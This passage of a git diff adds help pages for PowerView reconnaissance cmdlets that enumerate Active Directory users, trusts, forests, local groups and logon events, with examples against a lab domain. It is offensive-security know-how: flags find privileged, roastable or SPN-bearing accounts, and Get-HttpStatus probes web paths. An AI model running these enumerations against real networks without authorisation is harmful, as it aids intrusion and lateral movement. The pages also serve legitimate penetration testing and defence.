+### System.String + + +## OUTPUTS + +### PowerView.DomainTrust.NET +PowerView.DomainTrust.LDAP +PowerView.DomainTrust.API + + +## NOTES + +## RELATED 
LINKS + diff --git a/docs/Recon/Get-DomainTrustMapping.md b/docs/Recon/Get-DomainTrustMapping.md new file mode 100755 index 0000000..692f265 --- /dev/null +++ b/docs/Recon/Get-DomainTrustMapping.md 
@@ -0,0 +1,220 @@ +# Get-DomainTrustMapping + +## SYNOPSIS +{{Fill in the Synopsis}} + +## SYNTAX + +### NET (Default) +``` +Get-DomainTrustMapping +``` + +### API +``` +Get-DomainTrustMapping [-API] [-Server ] +``` + +### LDAP +``` +Get-DomainTrustMapping [-LDAP] [-LDAPFilter ] [-Properties ] [-SearchBase ] + [-Server ] [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-Tombstone] + [-Credential ] +``` + +## DESCRIPTION +{{Fill in the Description}} + +## EXAMPLES + +### Example 1 +``` +PS C:\> {{ Add example code here }} +``` + +{{ Add example description here }} + +## PARAMETERS + +### -API +{{Fill API Description}} + +```yaml +Type: SwitchParameter +Parameter Sets: API +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +{{Fill Credential Description}} + +```yaml +Type: PSCredential +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAP +{{Fill LDAP Description}} + +```yaml +Type: SwitchParameter +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +{{Fill LDAPFilter Description}} + +```yaml +Type: String +Parameter Sets: LDAP +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +{{Fill Properties Description}} + +```yaml +Type: String[] +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +{{Fill ResultPageSize Description}} + +```yaml +Type: Int32 +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard 
characters: False +``` + +### -SearchBase +{{Fill SearchBase Description}} + +```yaml +Type: String +Parameter Sets: LDAP +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +{{Fill SearchScope Description}} + +```yaml +Type: String +Parameter Sets: LDAP +Aliases: +Accepted values: Base, OneLevel, Subtree + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +{{Fill Server Description}} + +```yaml +Type: String +Parameter Sets: API, LDAP +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +{{Fill ServerTimeLimit Description}} + +```yaml +Type: Int32 +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +{{Fill Tombstone Description}} + +```yaml +Type: SwitchParameter +Parameter Sets: LDAP +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### None + + +## OUTPUTS + +### PowerView.DomainTrust.NET +PowerView.DomainTrust.LDAP +PowerView.DomainTrust.API + + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainUser.md b/docs/Recon/Get-DomainUser.md new file mode 100755 index 0000000..7247a1d --- /dev/null +++ b/docs/Recon/Get-DomainUser.md 
@@ -0,0 +1,426 @@ +# Get-DomainUser + +## SYNOPSIS +Return all users or specific user objects in AD. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-DomainSearcher, Convert-ADName, Convert-LDAPProperty + +## SYNTAX + +### AllowDelegation (Default) +``` +Get-DomainUser [[-Identity] ] [-SPN] [-AdminCount] [-AllowDelegation] [-KerberosPreuthNotRequired] + [-Domain ] [-LDAPFilter ] [-Properties ] [-SearchBase ] [-Server ] + [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] + [-Tombstone] [-FindOne] [-Credential ] [-Raw] +``` + +### DisallowDelegation +``` +Get-DomainUser [[-Identity] ] [-SPN] [-AdminCount] [-DisallowDelegation] [-KerberosPreuthNotRequired] + [-Domain ] [-LDAPFilter ] [-Properties ] [-SearchBase ] [-Server ] + [-SearchScope ] [-ResultPageSize ] [-ServerTimeLimit ] [-SecurityMasks ] + [-Tombstone] [-FindOne] [-Credential ] [-Raw] +``` + +## DESCRIPTION +Builds a directory searcher object using Get-DomainSearcher, builds a custom +LDAP filter based on targeting/filter parameters, and searches for all objects +matching the criteria. +To only return specific properies, use +"-Properties samaccountname,usnchanged,...". +By default, all user objects for +the current domain are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainUser -Domain testlab.local +``` + +Return all users for the testlab.local domain + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainUser "S-1-5-21-890171859-3433809279-3366196753-1108","administrator" +``` + +Return the user with the given SID, as well as Administrator. 
+ +### -------------------------- EXAMPLE 3 -------------------------- +``` +'S-1-5-21-890171859-3433809279-3366196753-1114', 'CN=dfm,CN=Users,DC=testlab,DC=local','4c435dd7-dc58-4b14-9a5e-1fdb0e80d201','administrator' | Get-DomainUser -Properties samaccountname,lastlogoff +``` + +lastlogoff samaccountname +---------- -------------- +12/31/1600 4:00:00 PM dfm.a +12/31/1600 4:00:00 PM dfm +12/31/1600 4:00:00 PM harmj0y +12/31/1600 4:00:00 PM Administrator + +### -------------------------- EXAMPLE 4 -------------------------- +``` +Get-DomainUser -SearchBase "LDAP://OU=secret,DC=testlab,DC=local" -AdminCount -AllowDelegation +``` + +Search the specified OU for privileged user (AdminCount = 1) that allow delegation + +### -------------------------- EXAMPLE 5 -------------------------- +``` +Get-DomainUser -LDAPFilter '(!primarygroupid=513)' -Properties samaccountname,lastlogon +``` + +Search for users with a primary group ID other than 513 ('domain users') and only return samaccountname and lastlogon + +### -------------------------- EXAMPLE 6 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainUser -Credential $Cred + +### -------------------------- EXAMPLE 7 -------------------------- +``` +Get-Domain | Select-Object -Expand name +``` + +testlab.local + +Get-DomainUser dev\user1 -Verbose -Properties distinguishedname +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=testlab,DC=local +VERBOSE: \[Get-DomainSearcher\] search string: LDAP://PRIMARY.testlab.local/DC=dev,DC=testlab,DC=local +VERBOSE: \[Get-DomainUser\] filter string: (&(samAccountType=805306368)(|(samAccountName=user1))) + +distinguishedname +----------------- +CN=user1,CN=Users,DC=dev,DC=testlab,DC=local + +## PARAMETERS + +### -Identity +A SamAccountName (e.g. +harmj0y), DistinguishedName (e.g. 
+CN=harmj0y,CN=Users,DC=testlab,DC=local), +SID (e.g. +S-1-5-21-890171859-3433809279-3366196753-1108), or GUID (e.g. +4c435dd7-dc58-4b14-9a5e-1fdb0e80d201). +Wildcards accepted. +Also accepts DOMAIN\user format. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: DistinguishedName, SamAccountName, Name, MemberDistinguishedName, MemberName + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -SPN +Switch. +Only return user objects with non-null service principal names. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -AdminCount +Switch. +Return users with '(adminCount=1)' (meaning are/were privileged). + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -AllowDelegation +Switch. +Return user accounts that are not marked as 'sensitive and not allowed for delegation' + +```yaml +Type: SwitchParameter +Parameter Sets: AllowDelegation +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -DisallowDelegation +Switch. +Return user accounts that are marked as 'sensitive and not allowed for delegation' + +```yaml +Type: SwitchParameter +Parameter Sets: DisallowDelegation +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -KerberosPreuthNotRequired +Switch. +Return user accounts with "Do not require Kerberos preauthentication" set. 
+ +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Domain +Specifies the domain to use for the query, defaults to the current domain. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -LDAPFilter +Specifies an LDAP query string that is used to filter Active Directory objects. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Filter + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Properties +Specifies the properties of the output object to retrieve from the server. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchBase +The LDAP source to search through, e.g. +"LDAP://OU=secret,DC=testlab,DC=local" +Useful for OU queries. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: ADSPath + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Server +Specifies an Active Directory server (domain controller) to bind to. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: DomainController + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SearchScope +Specifies the scope to search under, Base/OneLevel/Subtree (default of Subtree). 
+ +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: Subtree +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ResultPageSize +Specifies the PageSize to set for the LDAP searcher object. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 200 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -ServerTimeLimit +Specifies the maximum amount of time the server spends searching. +Default of 120 seconds. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -SecurityMasks +Specifies an option for examining security information of a directory object. +One of 'Dacl', 'Group', 'None', 'Owner', 'Sacl'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Tombstone +Switch. +Specifies that the searcher should also return deleted/tombstoned objects. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -FindOne +Only return one result object. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: ReturnOne + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. 
+ +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Raw +Switch. +Return raw results instead of translating the fields into a custom PSObject. + +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +### String + +## OUTPUTS + +### PowerView.User + +Custom PSObject with translated user property fields. + +PowerView.User.Raw + +The raw DirectoryServices.SearchResult object, if -Raw is enabled. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-DomainUserEvent.md b/docs/Recon/Get-DomainUserEvent.md new file mode 100755 index 0000000..c844981 --- /dev/null +++ b/docs/Recon/Get-DomainUserEvent.md 
@@ -0,0 +1,144 @@ +# Get-DomainUserEvent + +## SYNOPSIS +Enumerate account logon events (ID 4624) and Logon with explicit credential +events (ID 4648) from the specified host (default of the localhost). + +Author: Lee Christensen (@tifkin_), Justin Warner (@sixdub), Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: None + +## SYNTAX + +``` +Get-DomainUserEvent [[-ComputerName] ] [-StartTime ] [-EndTime ] + [-MaxEvents ] [-Credential ] +``` + +## DESCRIPTION +This function uses an XML path filter passed to Get-WinEvent to retrieve +security events with IDs of 4624 (logon events) or 4648 (explicit credential +logon events) from -StartTime (default of now-1 day) to -EndTime (default of now). +A maximum of -MaxEvents (default of 5000) are returned. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-DomainUserEvent +``` + +Return logon events on the local machine. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainController | Get-DomainUserEvent -StartTime ([DateTime]::Now.AddDays(-3)) +``` + +Return all logon events from the last 3 days from every domain controller in the current domain. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-DomainUserEvent -ComputerName PRIMARY.testlab.local -Credential $Cred -MaxEvents 1000 + +Return a max of 1000 logon events from the specified machine using the specified alternate credentials. + +## PARAMETERS + +### -ComputerName +Specifies the computer name to retrieve events from, default of localhost. 
+ +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: dnshostname, HostName, name + +Required: False +Position: 1 +Default value: $Env:COMPUTERNAME +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -StartTime +The \[DateTime\] object representing the start of when to collect events. +Default of \[DateTime\]::Now.AddDays(-1). + +```yaml +Type: DateTime +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [DateTime]::Now.AddDays(-1) +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -EndTime +The \[DateTime\] object representing the end of when to collect events. +Default of \[DateTime\]::Now. + +```yaml +Type: DateTime +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [DateTime]::Now +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -MaxEvents +The maximum number of events to retrieve. +Default of 5000. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: 5000 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target computer. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.LogonEvent + +PowerView.ExplicitCredentialLogonEvent + +## NOTES + +## RELATED LINKS + +[http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/](http://www.sixdub.net/2014/11/07/offensive-event-parsing-bringing-home-trophies/) + diff --git a/docs/Recon/Get-Forest.md b/docs/Recon/Get-Forest.md new file mode 100755 index 0000000..51ddef6 --- /dev/null +++ b/docs/Recon/Get-Forest.md 
@@ -0,0 +1,80 @@ +# Get-Forest + +## SYNOPSIS +Returns the forest object for the current (or specified) forest. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: ConvertTo-SID + +## SYNTAX + +``` +Get-Forest [[-Forest] ] [-Credential ] +``` + +## DESCRIPTION +Returns a System.DirectoryServices.ActiveDirectory.Forest object for the current +forest or the forest specified with -Forest X. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-Forest -Forest external.domain +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-Forest -Credential $Cred + +## PARAMETERS + +### -Forest +The forest name to query for, defaults to the current forest. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target forest. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.Management.Automation.PSCustomObject + +Outputs a PSObject containing System.DirectoryServices.ActiveDirectory.Forest in addition +to the forest root domain SID. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-ForestDomain.md b/docs/Recon/Get-ForestDomain.md new file mode 100755 index 0000000..d755c0c --- /dev/null +++ b/docs/Recon/Get-ForestDomain.md 
@@ -0,0 +1,82 @@ +# Get-ForestDomain + +## SYNOPSIS +Return all domains for the current (or specified) forest. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Forest + +## SYNTAX + +``` +Get-ForestDomain [[-Forest] ] [-Credential ] +``` + +## DESCRIPTION +Returns all domains for the current forest or the forest specified +by -Forest X. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ForestDomain +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-ForestDomain -Forest external.local +``` + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-ForestDomain -Credential $Cred + +## PARAMETERS + +### -Forest +Specifies the forest name to query for domains. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target forest. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.DirectoryServices.ActiveDirectory.Domain + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-ForestGlobalCatalog.md b/docs/Recon/Get-ForestGlobalCatalog.md new file mode 100755 index 0000000..c6da4bd --- /dev/null +++ b/docs/Recon/Get-ForestGlobalCatalog.md 
@@ -0,0 +1,78 @@ +# Get-ForestGlobalCatalog + +## SYNOPSIS +Return all global catalogs for the current (or specified) forest. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Forest + +## SYNTAX + +``` +Get-ForestGlobalCatalog [[-Forest] ] [-Credential ] +``` + +## DESCRIPTION +Returns all global catalogs for the current forest or the forest specified +by -Forest X by using Get-Forest to retrieve the specified forest object +and the .FindAllGlobalCatalogs() to enumerate the global catalogs. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ForestGlobalCatalog +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-ForestGlobalCatalog -Credential $Cred + +## PARAMETERS + +### -Forest +Specifies the forest name to query for global catalogs. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### System.DirectoryServices.ActiveDirectory.GlobalCatalog + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-ForestTrust.md b/docs/Recon/Get-ForestTrust.md new file mode 100755 index 0000000..0ff5e3d --- /dev/null +++ b/docs/Recon/Get-ForestTrust.md 
@@ -0,0 +1,91 @@ +# Get-ForestTrust + +## SYNOPSIS +Return all forest trusts for the current forest or a specified forest. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: Get-Forest + +## SYNTAX + +``` +Get-ForestTrust [[-Forest] ] [-Credential ] +``` + +## DESCRIPTION +This function will enumerate domain trust relationships for the current (or a remote) +forest using number of method using the .NET method GetAllTrustRelationships() on a +System.DirectoryServices.ActiveDirectory.Forest returned by Get-Forest. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-ForestTrust +``` + +Return current forest trusts. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-ForestTrust -Forest "external.local" +``` + +Return trusts for the "external.local" forest. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-ForestTrust -Forest "external.local" -Credential $Cred + +Return trusts for the "external.local" forest using the specified alternate credenitals. + +## PARAMETERS + +### -Forest +Specifies the forest to query for trusts, defaults to the current forest. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: Name + +Required: False +Position: 1 +Default value: None +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the target domain. 
+ +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.DomainTrust.NET + +A TrustRelationshipInformationCollection returned when using .NET methods (default). + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-HttpStatus.md b/docs/Recon/Get-HttpStatus.md new file mode 100755 index 0000000..a8a7dbb --- /dev/null +++ b/docs/Recon/Get-HttpStatus.md 
@@ -0,0 +1,106 @@ +# Get-HttpStatus + +## SYNOPSIS +Returns the HTTP Status Codes and full URL for specified paths. + +PowerSploit Function: Get-HttpStatus +Author: Chris Campbell (@obscuresec) +License: BSD 3-Clause +Required Dependencies: None +Optional Dependencies: None + +## SYNTAX + +``` +Get-HttpStatus [-Target] [[-Path] ] [[-Port] ] [-UseSSL] +``` + +## DESCRIPTION +A script to check for the existence of a path or file on a webserver. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt | Select-Object {where StatusCode -eq 20*} +``` + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-HttpStatus -Target www.example.com -Path c:\dictionary.txt -UseSSL +``` + +## PARAMETERS + +### -Target +Specifies the remote web host either by IP or hostname. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: True +Position: 1 +Default value: None +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Path +Specifies the remost host. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: + +Required: False +Position: 2 +Default value: .\Dictionaries\admin.txt +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Port +Specifies the port to connect to. + +```yaml +Type: Int32 +Parameter Sets: (All) +Aliases: + +Required: False +Position: 3 +Default value: 0 +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -UseSSL +Use an SSL connection. 
+ +```yaml +Type: SwitchParameter +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: False +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +## NOTES +HTTP Status Codes: 100 - Informational * 200 - Success * 300 - Redirection * 400 - Client Error * 500 - Server Error + +## RELATED LINKS + +[http://obscuresecurity.blogspot.com +http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html]() + diff --git a/docs/Recon/Get-NetComputerSiteName.md b/docs/Recon/Get-NetComputerSiteName.md new file mode 100755 index 0000000..1a3a964 --- /dev/null +++ b/docs/Recon/Get-NetComputerSiteName.md 
@@ -0,0 +1,89 @@ +# Get-NetComputerSiteName + +## SYNOPSIS +Returns the AD site where the local (or a remote) machine resides. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect, Invoke-UserImpersonation, Invoke-RevertToSelf + +## SYNTAX + +``` +Get-NetComputerSiteName [[-ComputerName] ] [-Credential ] +``` + +## DESCRIPTION +This function will use the DsGetSiteName Win32API call to look up the +name of the site where a specified computer resides. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local +``` + +Returns the site for WINDOWS1.testlab.local. + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-DomainComputer | Get-NetComputerSiteName +``` + +Returns the sites for every machine in AD. + +### -------------------------- EXAMPLE 3 -------------------------- +``` +$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force +``` + +$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword) +Get-NetComputerSiteName -ComputerName WINDOWS1.testlab.local -Credential $Cred + +## PARAMETERS + +### -ComputerName +Specifies the hostname to check the site for (also accepts IP addresses). +Defaults to 'localhost'. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: Localhost +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to the remote system using Invoke-UserImpersonation. 
+ +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.ComputerSite + +A PSCustomObject containing the ComputerName, IPAddress, and associated Site name. + +## NOTES + +## RELATED LINKS + diff --git a/docs/Recon/Get-NetLocalGroup.md b/docs/Recon/Get-NetLocalGroup.md new file mode 100755 index 0000000..29ac4d6 --- /dev/null +++ b/docs/Recon/Get-NetLocalGroup.md 
@@ -0,0 +1,132 @@ +# Get-NetLocalGroup + +## SYNOPSIS +Enumerates the local groups on the local (or remote) machine. + +Author: Will Schroeder (@harmj0y) +License: BSD 3-Clause +Required Dependencies: PSReflect + +## SYNTAX + +``` +Get-NetLocalGroup [[-ComputerName] ] [-Method ] [-Credential ] +``` + +## DESCRIPTION +This function will enumerate the names and descriptions for the +local groups on the current, or remote, machine. +By default, the Win32 API +call NetLocalGroupEnum will be used (for speed). +Specifying "-Method WinNT" +causes the WinNT service provider to be used instead, which returns group +SIDs along with the group names and descriptions/comments. + +## EXAMPLES + +### -------------------------- EXAMPLE 1 -------------------------- +``` +Get-NetLocalGroup +``` + +ComputerName GroupName Comment +------------ --------- ------- +WINDOWS1 Administrators Administrators have comple... +WINDOWS1 Backup Operators Backup Operators can overr... +WINDOWS1 Cryptographic Operators Members are authorized to ... +... + +### -------------------------- EXAMPLE 2 -------------------------- +``` +Get-NetLocalGroup -Method Winnt +``` + +ComputerName GroupName GroupSID Comment +------------ --------- -------- ------- +WINDOWS1 Administrators S-1-5-32-544 Administrators hav... +WINDOWS1 Backup Operators S-1-5-32-551 Backup Operators c... +WINDOWS1 Cryptographic Opera... +S-1-5-32-569 Members are author... +... + +### -------------------------- EXAMPLE 3 -------------------------- +``` +Get-NetLocalGroup -ComputerName primary.testlab.local +``` + +ComputerName GroupName Comment +------------ --------- ------- +primary.testlab.local Administrators Administrators have comple... +primary.testlab.local Users Users are prevented from m... +primary.testlab.local Guests Guests have the same acces... +primary.testlab.local Print Operators Members can administer dom... +primary.testlab.local Backup Operators Backup Operators can overr... 
+ +## PARAMETERS + +### -ComputerName +Specifies the hostname to query for sessions (also accepts IP addresses). +Defaults to the localhost. + +```yaml +Type: String[] +Parameter Sets: (All) +Aliases: HostName, dnshostname, name + +Required: False +Position: 1 +Default value: $Env:COMPUTERNAME +Accept pipeline input: True (ByPropertyName, ByValue) +Accept wildcard characters: False +``` + +### -Method +The collection method to use, defaults to 'API', also accepts 'WinNT'. + +```yaml +Type: String +Parameter Sets: (All) +Aliases: CollectionMethod + +Required: False +Position: Named +Default value: API +Accept pipeline input: False +Accept wildcard characters: False +``` + +### -Credential +A \[Management.Automation.PSCredential\] object of alternate credentials +for connection to a remote machine. +Only applicable with "-Method WinNT". + +```yaml +Type: PSCredential +Parameter Sets: (All) +Aliases: + +Required: False +Position: Named +Default value: [Management.Automation.PSCredential]::Empty +Accept pipeline input: False +Accept wildcard characters: False +``` + +## INPUTS + +## OUTPUTS + +### PowerView.LocalGroup.API + +Custom PSObject with translated group property fields from API results. + +PowerView.LocalGroup.WinNT + +Custom PSObject with translated group property fields from WinNT results. + +## NOTES + +## RELATED LINKS + +[https://msdn.microsoft.com/en-us/library/windows/desktop/aa370440(v=vs.85).aspx](https://msdn.microsoft.com/en-us/library/windows/desktop/aa370440(v=vs.85).aspx) + diff --git a/docs/Recon/Get-NetLocalGroupMember.md b/docs/Recon/Get-NetLocalGroupMember.md new file mode 100755 index 0000000..302302b --- /dev/null +++ b/docs/Recon/Get-NetLocalGroupMember.md 
